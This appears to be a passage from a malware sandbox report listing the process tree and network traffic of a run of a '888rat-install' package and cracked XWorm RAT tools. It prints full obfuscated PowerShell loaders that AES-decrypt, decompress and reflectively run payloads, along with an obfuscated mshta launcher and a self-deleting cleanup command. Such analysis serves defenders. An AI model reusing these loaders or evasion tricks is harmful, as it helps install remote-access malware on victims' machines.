'').('gnirtSteG'[-1..-9] -join '')($XPhKE);$muibj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('omE0gz6POPNwhNmUAnPGH44LhwPPACLWik/KT0dk5wsKXAxtKag+L5FPGR5kaqhlGUck2HtfdRNBwrYMOEAetiGgAox0exmtDDnAYLadphZBvi4OP8B8BNL4k5y/z1AEr7oudmgyCQifH3aXxa/gUUa4xjDsSD2YTOub7PHlsdmqG91RSBUMJH4vfT2zptSsj0OSscQsY4xVPZ8OjeRKbzP+BjF+Uue1s9LcXQdrizsUEKJN4dY28g0skU19VzfudgJv7Qa+SS93YCgWa9n+oNhygZquca/xgmF4Z+su7WedF+8tBgUKzviRtdEdVgLq/OMSlirCLjvFnSHC2y9K1oTEEyD1mQB836kwPebOOTmBNH6vdn2bEQQYiF/vc3FItt5vYPuWyJGzUen95KOQjYu7YoPz/dFXDUgmI65vnuw=');$muibj = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($muibj, 0, $muibj.Length);$muibj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($muibj);$DHHcr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tYnkG6mWBgWnZf6oIR3L5A==');$DHHcr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DHHcr, 0, $DHHcr.Length);$DHHcr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DHHcr);$EQNXr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fF2zWzAZ0BefyD1XaGcLw==');$EQNXr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EQNXr, 0, $EQNXr.Length);$EQNXr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EQNXr);$mYQZS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3I7S8iNpJjrn0k9Lgckneg==');$mYQZS = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mYQZS, 0, $mYQZS.Length);$mYQZS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mYQZS);$DbkFT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8BsdeVWD9I78LbbRhRFrA==');$DbkFT = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DbkFT, 0, $DbkFT.Length);$DbkFT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DbkFT);$jgfOd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEFFbXtp5W2U1hAoq0CpPw==');$jgfOd = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jgfOd, 0, $jgfOd.Length);$jgfOd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jgfOd);$kveij0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1+Vym/OwDnC1v1RFNGQ5MA==');$kveij0 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij0, 0, $kveij0.Length);$kveij0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij0);$kveij1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1UB7UYof3ztQu3+ei666DQ==');$kveij1 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij1, 0, $kveij1.Length);$kveij1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij1);$kveij2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9594UuKb/Z+/WVWczIhxbQ==');$kveij2 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij2, 0, $kveij2.Length);$kveij2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij2);$kveij3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxkDZyakK1CM3mmPkfi6OQ==');$kveij3 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij3, 0, $kveij3.Length);$kveij3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij3);$lkChZ.Dispose();$Elzpw1.Dispose();if (@(get-process -ea silentlycontinue $kveij3).count -gt 1) {exit};$ebqGe = [Microsoft.Win32.Registry]::$DbkFT.$mYQZS($kveij).$EQNXr($uYwHJ);$SceND=[string[]]$ebqGe.Split('\');$sNXpr=FJcTY(hufeg([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[1])));vUmWc $sNXpr (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$GiWwX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[0]);$Elzpw = New-Object System.Security.Cryptography.AesManaged;$Elzpw.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$wCTZr = $Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')();$GiWwX = $wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GiWwX, 0, $GiWwX.Length);$wCTZr.Dispose();$Elzpw.Dispose();$KHdof = New-Object System.IO.MemoryStream(, $GiWwX);$mdDGq = New-Object System.IO.MemoryStream;$PZsap = New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::$kveij1);$PZsap.$jgfOd($mdDGq);$PZsap.Dispose();$KHdof.Dispose();$mdDGq.Dispose();$GiWwX = $mdDGq.ToArray();$cyNnW = $muibj | IEX;$YHPse = $cyNnW::$kveij2($GiWwX);$aMqIy = $YHPse.EntryPoint;$aMqIy.$kveij0($null, (, [string[]] ($XPhKE)))

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5108 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:1

C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe

"888rat-install.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function agDFc($vCpVI){ $Qviqn=[System.Security.Cryptography.Aes]::Create(); $Qviqn.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Qviqn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Qviqn.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eSyKXuxugFflvGlW9qE6Iqg8XcAom2v4/DjQoKKC570='); $Qviqn.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9iro50udEDaxZ/wkUff9RA=='); $FmMlx=$Qviqn.CreateDecryptor(); $return_var=$FmMlx.TransformFinalBlock($vCpVI, 0, $vCpVI.Length); $FmMlx.Dispose(); $Qviqn.Dispose(); $return_var;}function cZEYh($vCpVI){ $WLTiH=New-Object System.IO.MemoryStream(,$vCpVI); $KNxYU=New-Object System.IO.MemoryStream; $LOvEr=New-Object System.IO.Compression.GZipStream($WLTiH, [IO.Compression.CompressionMode]::Decompress); $LOvEr.CopyTo($KNxYU); $LOvEr.Dispose(); $WLTiH.Dispose(); $KNxYU.Dispose(); $KNxYU.ToArray();}function fELFD($vCpVI,$TXpag){ $fzHaG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$vCpVI); $UtByz=$fzHaG.EntryPoint; $UtByz.Invoke($null, $TXpag);}$QLGin=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Desktop\888RAT\888rat-install.bat').Split([Environment]::NewLine);foreach ($AkEcQ in $QLGin) { if ($AkEcQ.StartsWith('SEROXEN')) { $fJBxd=$AkEcQ.Substring(7); break; }}$CjuJm=[string[]]$fJBxd.Split('\');$hxBpb=cZEYh (agDFc ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($CjuJm[0])));$OyvxC=cZEYh (agDFc ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($CjuJm[1])));fELFD $OyvxC (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));fELFD $hxBpb (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=4944 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:1

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{8e7864dd-ec75-4498-ae93-789111ee90ef}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{51fac0a2-0601-4b32-9b41-c082947eb8c1}

C:\Windows\$sxr-mshta.exe

C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-jUsBURfHSoufmNeEAjpO4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"

C:\Windows\$sxr-cmd.exe

"C:\Windows\$sxr-cmd.exe" /c %$sxr-jUsBURfHSoufmNeEAjpO4312:&#<?=%

C:\Windows\$sxr-powershell.exe

C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function hufeg($iDMxb){ $Elzpw=[System.Security.Cryptography.Aes]::Create(); $Elzpw.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Elzpw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Elzpw.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk='); $Elzpw.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA=='); $wCTZr=$Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')(); $YgtPo=$wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iDMxb, 0, $iDMxb.Length); $wCTZr.Dispose(); $Elzpw.Dispose(); $YgtPo;}function FJcTY($iDMxb){ $KHdof=New-Object System.IO.MemoryStream(,$iDMxb); $mdDGq=New-Object System.IO.MemoryStream; $PZsap=New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::Decompress); $PZsap.CopyTo($mdDGq); $PZsap.Dispose(); $KHdof.Dispose(); $mdDGq.Dispose(); $mdDGq.ToArray();}function vUmWc($iDMxb,$PbTpW){ $YHPse=[System.Reflection.Assembly]::Load([byte[]]$iDMxb); $aMqIy=$YHPse.EntryPoint; $aMqIy.Invoke($null, $PbTpW);}$Elzpw1 = New-Object System.Security.Cryptography.AesManaged;$Elzpw1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$lkChZ = $Elzpw1.('rotpyrceDetaerC'[-1..-15] -join '')();$kveij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('skxuT638mXYXO82tnMu4Nw==');$kveij = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij, 0, $kveij.Length);$kveij = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij);$uYwHJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7tPhtRoBPpmbD4jKqCrROmZ5ihpYMWVokvpj2Ng/Pz8=');$uYwHJ = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uYwHJ, 0, $uYwHJ.Length);$uYwHJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uYwHJ);$XPhKE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MN4dM3v9612JtLqaveCMYg==');$XPhKE = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XPhKE, 0, $XPhKE.Length);$XPhKE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XPhKE);$muibj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('omE0gz6POPNwhNmUAnPGH44LhwPPACLWik/KT0dk5wsKXAxtKag+L5FPGR5kaqhlGUck2HtfdRNBwrYMOEAetiGgAox0exmtDDnAYLadphZBvi4OP8B8BNL4k5y/z1AEr7oudmgyCQifH3aXxa/gUUa4xjDsSD2YTOub7PHlsdmqG91RSBUMJH4vfT2zptSsj0OSscQsY4xVPZ8OjeRKbzP+BjF+Uue1s9LcXQdrizsUEKJN4dY28g0skU19VzfudgJv7Qa+SS93YCgWa9n+oNhygZquca/xgmF4Z+su7WedF+8tBgUKzviRtdEdVgLq/OMSlirCLjvFnSHC2y9K1oTEEyD1mQB836kwPebOOTmBNH6vdn2bEQQYiF/vc3FItt5vYPuWyJGzUen95KOQjYu7YoPz/dFXDUgmI65vnuw=');$muibj = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($muibj, 0, $muibj.Length);$muibj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($muibj);$DHHcr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tYnkG6mWBgWnZf6oIR3L5A==');$DHHcr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DHHcr, 0, $DHHcr.Length);$DHHcr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DHHcr);$EQNXr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fF2zWzAZ0BefyD1XaGcLw==');$EQNXr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EQNXr, 0, $EQNXr.Length);$EQNXr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EQNXr);$mYQZS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3I7S8iNpJjrn0k9Lgckneg==');$mYQZS = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mYQZS, 0, $mYQZS.Length);$mYQZS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mYQZS);$DbkFT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8BsdeVWD9I78LbbRhRFrA==');$DbkFT = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DbkFT, 0, $DbkFT.Length);$DbkFT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DbkFT);$jgfOd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEFFbXtp5W2U1hAoq0CpPw==');$jgfOd = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jgfOd, 0, $jgfOd.Length);$jgfOd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jgfOd);$kveij0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1+Vym/OwDnC1v1RFNGQ5MA==');$kveij0 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij0, 0, $kveij0.Length);$kveij0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij0);$kveij1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1UB7UYof3ztQu3+ei666DQ==');$kveij1 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij1, 0, $kveij1.Length);$kveij1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij1);$kveij2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9594UuKb/Z+/WVWczIhxbQ==');$kveij2 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij2, 0, $kveij2.Length);$kveij2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij2);$kveij3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxkDZyakK1CM3mmPkfi6OQ==');$kveij3 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij3, 0, $kveij3.Length);$kveij3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij3);$lkChZ.Dispose();$Elzpw1.Dispose();if (@(get-process -ea silentlycontinue $kveij3).count -gt 1) {exit};$ebqGe = [Microsoft.Win32.Registry]::$DbkFT.$mYQZS($kveij).$EQNXr($uYwHJ);$SceND=[string[]]$ebqGe.Split('\');$sNXpr=FJcTY(hufeg([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[1])));vUmWc $sNXpr (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$GiWwX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[0]);$Elzpw = New-Object System.Security.Cryptography.AesManaged;$Elzpw.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$wCTZr = $Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')();$GiWwX = $wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GiWwX, 0, $GiWwX.Length);$wCTZr.Dispose();$Elzpw.Dispose();$KHdof = New-Object System.IO.MemoryStream(, $GiWwX);$mdDGq = New-Object System.IO.MemoryStream;$PZsap = New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::$kveij1);$PZsap.$jgfOd($mdDGq);$PZsap.Dispose();$KHdof.Dispose();$mdDGq.Dispose();$GiWwX = $mdDGq.ToArray();$cyNnW = $muibj | IEX;$YHPse = $cyNnW::$kveij2($GiWwX);$aMqIy = $YHPse.EntryPoint;$aMqIy.$kveij0($null, (, [string[]] ($XPhKE)))

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{9eee3641-dc1b-495d-b650-3eecbd79cf09}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{1a5d9ebd-971c-4ad6-8a72-3306c57d17b8}

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1448 --field-trial-handle=1852,i,6350202070883517753,13609223601977129310,131072 /prefetch:8

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe" & ATTRIB -h -s "C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe" & del /f "C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe" & exit

C:\Windows\system32\PING.EXE

PING localhost -n 8

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{fc9aad12-f1c9-4ce6-846c-c0f689a5ffb5}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{7fa76853-40fe-4e4c-991b-dd8d66d2a063}

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe" & ATTRIB -h -s "C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe" & del /f "C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe" & exit

C:\Windows\system32\PING.EXE

PING localhost -n 8

C:\Windows\system32\taskkill.exe

taskkill /F /IM "C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe"

C:\Windows\system32\attrib.exe

ATTRIB -h -s "C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe"

C:\Windows\system32\taskkill.exe

taskkill /F /IM "C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe"

C:\Windows\system32\attrib.exe

ATTRIB -h -s "C:\Users\Admin\Desktop\888RAT\888rat-install.bat.exe"

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap26095:100:7zEvent18962

C:\Users\Admin\Desktop\all-cracked-rats-main\XWorm V5.0\crack.exe

"C:\Users\Admin\Desktop\all-cracked-rats-main\XWorm V5.0\crack.exe"

C:\Users\Admin\Desktop\all-cracked-rats-main\XWorm V5.0\XWormLoader.exe

"C:\Users\Admin\Desktop\all-cracked-rats-main\XWorm V5.0\XWormLoader.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2276 -s 132

C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe

"C:\Users\Admin\AppData\Local\Temp\XWormLoader.exe"

C:\Users\Admin\AppData\Local\Temp\Client.exe

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

C:\Users\Admin\Desktop\all-cracked-rats-main\XWorm V5.0\XWorm V5.0.exe

"C:\Users\Admin\Desktop\all-cracked-rats-main\XWorm V5.0\XWorm V5.0.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.0.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.0.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 812

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4544 -s 252

C:\Users\Admin\Desktop\all-cracked-rats-main\XWorm V5.0\XWorm V5.0.exe

"C:\Users\Admin\Desktop\all-cracked-rats-main\XWorm V5.0\XWorm V5.0.exe"

C:\Users\Admin\AppData\Local\Temp\XWorm V5.0.exe

"C:\Users\Admin\AppData\Local\Temp\XWorm V5.0.exe"

C:\Users\Admin\AppData\Local\Temp\Client.exe

"C:\Users\Admin\AppData\Local\Temp\Client.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 132

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

Network

Country Destination Domain Proto
US 8.8.8.8:53 google.com udp
NL 142.250.179.142:443 google.com tcp
NL 142.250.179.142:443 google.com tcp
US 8.8.8.8:53 142.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 content-autofill.googleapis.com udp
NL 142.250.179.202:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 apis.google.com udp
DE 172.217.23.206:443 apis.google.com udp
US 8.8.8.8:53 202.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 206.23.217.172.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 github.com udp
US 140.82.114.4:443 github.com tcp
US 140.82.114.4:443 github.com tcp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.133:443 avatars.githubusercontent.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 4.114.82.140.in-addr.arpa udp
US 8.8.8.8:53 154.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
NL 142.250.179.202:443 content-autofill.googleapis.com udp
US 8.8.8.8:53 collector.github.com udp
US 140.82.114.21:443 collector.github.com tcp
US 8.8.8.8:53 21.114.82.140.in-addr.arpa udp
US 8.8.8.8:53 api.github.com udp
US 140.82.114.6:443 api.github.com tcp
US 8.8.8.8:53 6.114.82.140.in-addr.arpa udp
US 8.8.8.8:53 codeload.github.com udp
US 140.82.114.9:443 codeload.github.com tcp
US 8.8.8.8:53 9.114.82.140.in-addr.arpa udp
NL 142.250.179.142:443 google.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 192.178.49.195:443 beacons.gcp.gvt2.com tcp
US 192.178.49.195:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 195.49.178.192.in-addr.arpa udp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 216.239.32.117:443 beacons2.gvt2.com tcp
US 216.239.32.117:443 beacons2.gvt2.com udp
US 8.8.8.8:53 117.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 217.14.97.104.in-addr.arpa udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
US 8.8.8.8:53 api.github.com udp
US 140.82.113.6:443 api.github.com tcp
US 8.8.8.8:53 6.113.82.140.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.githubassets.com udp
US 185.199.108.133:443 user-images.githubusercontent.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 140.82.112.3:443 github.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 google.com udp
US 192.178.49.195:443 beacons.gcp.gvt2.com udp
NL 142.250.179.142:443 google.com udp
US 8.8.8.8:53 3.112.82.140.in-addr.arpa udp
US 192.178.49.195:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 collector.github.com udp
US 140.82.112.21:443 collector.github.com tcp
US 8.8.8.8:53 21.112.82.140.in-addr.arpa udp
US 216.239.32.117:443 beacons2.gvt2.com udp
US 216.239.32.117:443 beacons2.gvt2.com tcp
US 8.8.8.8:53 codeload.github.com udp
US 140.82.113.10:443 codeload.github.com tcp
US 8.8.8.8:53 10.113.82.140.in-addr.arpa udp
US 8.8.8.8:53 beacons.gvt2.com udp
GB 216.58.204.67:443 beacons.gvt2.com tcp
